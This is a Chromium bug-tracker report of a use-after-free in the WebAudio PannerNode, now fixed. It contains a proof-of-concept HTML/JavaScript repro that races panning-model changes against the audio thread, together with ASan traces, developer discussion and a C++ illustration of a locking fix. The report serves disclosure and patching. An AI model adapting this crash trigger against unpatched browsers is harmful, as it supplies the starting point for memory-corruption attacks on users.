
Issue 172331


Issue metadata

Status: Fixed
Owner:
Closed: Feb 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Use-after-free in WebCore::VectorMath::vsmul

Reported by attek...@gmail.com, Jan 25 2013

Issue description


Tested on:

OS: Ubuntu 12.04
Chromium: 26.0.1394.0 (Developer Build 178763) 

Repro-file:

<html>
<script>
var context1 = new webkitAudioContext();
var BiquadFilter8 = context1.createBiquadFilter();
var Oscillator1 = context1.createOscillator();
var Panner3 = context1.createPanner();

Panner3.connect(BiquadFilter8);
Oscillator1.connect(Panner3);
Panner3.setPosition(119, 117, 51);
BiquadFilter8.connect(context1.destination);

// Main thread: each panningModel change replaces the node's HRTFPanner
// while the audio thread may still be inside PannerNode::process().
setInterval(function() {
  Panner3.setPosition(358, 182, 358);
  Panner3.panningModel = 0;
  Panner3.panningModel = 1;
}, 2);

Oscillator1.start(0.8198733804747462, 0.8382269653957337, 0.03957605152390897);
</script>
</html>

ASAN report (the same repro file causes multiple different ASAN traces):

==11957== ERROR: AddressSanitizer: heap-use-after-free on address 0x7fa68c0dd040 at pc 0x7fa6aa5ba5f7 bp 0x7fa690f68b50 sp 0x7fa690f68b48
WRITE of size 16 at 0x7fa68c0dd040 thread T6 (AudioOutputDevic)
    #0 0x7fa6aa5ba5f6 in WebCore::VectorMath::vsmul(float const*, int, float const*, float*, int, unsigned long) ???:0
    #1 0x7fa6aa5bdf7b in WebCore::FFTFrame::doInverseFFT(float*) ???:0
    #2 0x7fa6aa7bda8d in WebCore::FFTConvolver::process(WebCore::FFTFrame*, float const*, float*, unsigned long) ???:0
    #3 0x7fa6aa7c552d in WebCore::HRTFPanner::pan(double, double, WebCore::AudioBus const*, WebCore::AudioBus*, unsigned long) ???:0
    #4 0x7fa6a7e58d37 in WebCore::PannerNode::process(unsigned long) ???:0
    #5 0x7fa6a7439d6c in WebCore::AudioNode::processIfNecessary(unsigned long) ???:0
.
.
.
freed by thread T0 (chrome) here:
    #0 0x7f5970aad832 in free ??:0
    #1 0x7f59775b0392 in WebCore::HRTFPanner::~HRTFPanner() ???:0
    #2 0x7f59775b002d in WebCore::HRTFPanner::~HRTFPanner() ???:0
    #3 0x7f5974c46f66 in WebCore::PannerNode::setPanningModel(unsigned int) ???:0
    #4 0x7f5979601820 in WebCore::V8PannerNode::panningModelAccessorSetter(v8::Local<v8::String>, v8::Local<v8::Value>, v8::AccessorInfo const&) ???:0
    #5 0x7f5977d82dff in v8::internal::StoreCallbackProperty(v8::internal::Arguments, v8::internal::Isolate*) ???:0
.
.
.

Cc: crogers@google.com scherkus@chromium.org dalecur...@chromium.org
Owner: rtoy@chromium.org
Status: Assigned

Comment 2 by cdn@chromium.org, Jan 31 2013

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High SecImpacts-Stable SecImpacts-Beta OS-All Mstone-24
filed upstream as https://bugs.webkit.org/show_bug.cgi?id=108527

rtoy@ are you looking at this?

Comment 3 by parisa@chromium.org, Feb 11 2013

Hey Raymond,

I'm following up on all the open high-severity security bugs since Pwnium/Pwn2Own (http://blog.chromium.org/2013/01/show-off-your-security-skills-pwn2own.html) is just around the corner (we're using M25).

Are you on this one? Otherwise we need to find a new owner quick. Thanks for any help!

Comment 4 by rtoy@chromium.org, Feb 11 2013

I am looking into this.  It may take some time to get to the bottom of
this, though.  I think it might be caused by using an object after it has
been freed.  Maybe.

Comment 5 by crogers@google.com, Feb 12 2013

Ray, this looks like a thread safety issue in PannerNode::setPanningModel().  It looks like we need to have a mutex using a MutexTryLocker in PannerNode::process() analogous to how m_processLock is used in AudioBufferSourceNode (when m_buffer is changed)

Comment 6 by rtoy@chromium.org, Feb 12 2013

Yes, that's what I was seeing.  I'll take a look at doing it that way. (I
had made a change that saved the new panner in setPanningModel and then
applied that change at the start of PannerNode::process.)

Ray
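The MutexTryLocker approach crogers@ describes in comment 5, and the deferred-swap idea rtoy@ mentions in comment 6, reduced to a minimal stand-alone C++ model: the main thread frees the old panner only while holding the lock, and the real-time audio thread only try-locks, dropping the quantum rather than touching a panner mid-destruction. This is an added illustration, not the WebKit patch at changeset 142687; Panner, PannerNode, processDuringSwap, processIdle and the whileLocked test hook are simplified stand-ins for the WebCore classes, not their real API.

```cpp
#include <cstddef>
#include <functional>
#include <memory>
#include <mutex>
#include <thread>
#include <vector>
// Stand-in for the HRTFPanner freed in the trace; pan() writes its work buffer
// the way vsmul() does at the top of the ASan stack.
struct Panner {
    std::vector<float> work;
    explicit Panner(std::size_t frames) : work(frames, 0.0f) {}
    void pan(float gain) { for (float& s : work) s = gain; }
};

class PannerNode {
public:
    explicit PannerNode(std::size_t frames) : m_frames(frames), m_panner(std::make_unique<Panner>(frames)) {}

    // Main thread: the old panner is destroyed while m_processLock is held, so the
    // audio thread can never be inside pan() on an object that is being freed.
    // whileLocked is a hypothetical test hook standing in for work done under the lock.
    void setPanningModel(unsigned /*model*/, const std::function<void()>& whileLocked = {}) {
        std::lock_guard<std::mutex> lock(m_processLock);
        m_panner = std::make_unique<Panner>(m_frames); // old Panner freed here, under the lock
        if (whileLocked) whileLocked();
    }
    // Audio thread: real-time code must not block, so only try the lock. If the
    // main thread is mid-swap, drop this quantum (silence) and report false.
    bool process(float gain) {
        std::unique_lock<std::mutex> tryLocker(m_processLock, std::try_to_lock);
        if (!tryLocker.owns_lock()) return false;
        m_panner->pan(gain);
        return true;
    }
private:
    std::size_t m_frames;
    std::mutex m_processLock;
    std::unique_ptr<Panner> m_panner;
};
// Audio thread arrives while the main thread is still inside setPanningModel():
// the try-lock makes it back off instead of racing the destructor (returns false).
bool processDuringSwap() {
    PannerNode node(128);
    bool rendered = true;
    node.setPanningModel(1, [&] { std::thread([&] { rendered = node.process(0.5f); }).join(); });
    return rendered;
}
// No swap in progress: the audio thread takes the lock and renders (returns true).
bool processIdle() { PannerNode node(128); return node.process(0.5f); }
```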

Comment 7 by crogers@google.com, Feb 13 2013

Status: Fixed
Looks like the fix landed in WebKit:
http://trac.webkit.org/changeset/142687

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved reward-topanel
Labels: -Mstone-24 -Merge-Approved Mstone-25 Merge-Merged Release-1
M25: http://trac.webkit.org/changeset/143513
Labels: CVE-2013-0904
Labels: -reward-topanel reward-1000 reward-unpaid
$1000

Comment 13 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Mstone-25 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security M-25
Labels: -reward-unpaid reward-inprocess

Comment 15 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 16 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 17 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 18 by bugdroid1@chromium.org, Apr 5 2013

Labels: -Cr-Content Cr-Blink
Labels: -reward-inprocess
Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.


Comment 21 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta

Comment 22 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 23 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
